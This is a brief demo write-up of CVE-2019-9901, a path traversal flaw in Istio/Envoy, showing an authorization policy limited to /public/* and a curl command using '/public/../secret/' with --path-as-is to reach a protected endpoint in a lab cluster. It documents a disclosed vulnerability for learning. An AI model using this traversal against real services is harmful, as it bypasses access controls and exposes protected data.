CVE-2019-9901 - Istio/Envoy Path traversal
This scenario demos has been taken from https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md. Thanks to Erlend Oftedal
A simple project with a web server and deployed it on Kubernetes. The web application had two endpoints /public/
and /secret/
. Added an authorization policy which tried to grant access to anything below /public/
:
rules:
- services: ["backend.fishy.svc.cluster.local"]
methods: ["GET"]
paths: ["/public/*"]
Then used standard path traversal from curl:
curl -vvvv --path-as-is "http://backend.fishy.svc.cluster.local:8081/public/../secret/"
And was able to reach /secret/
.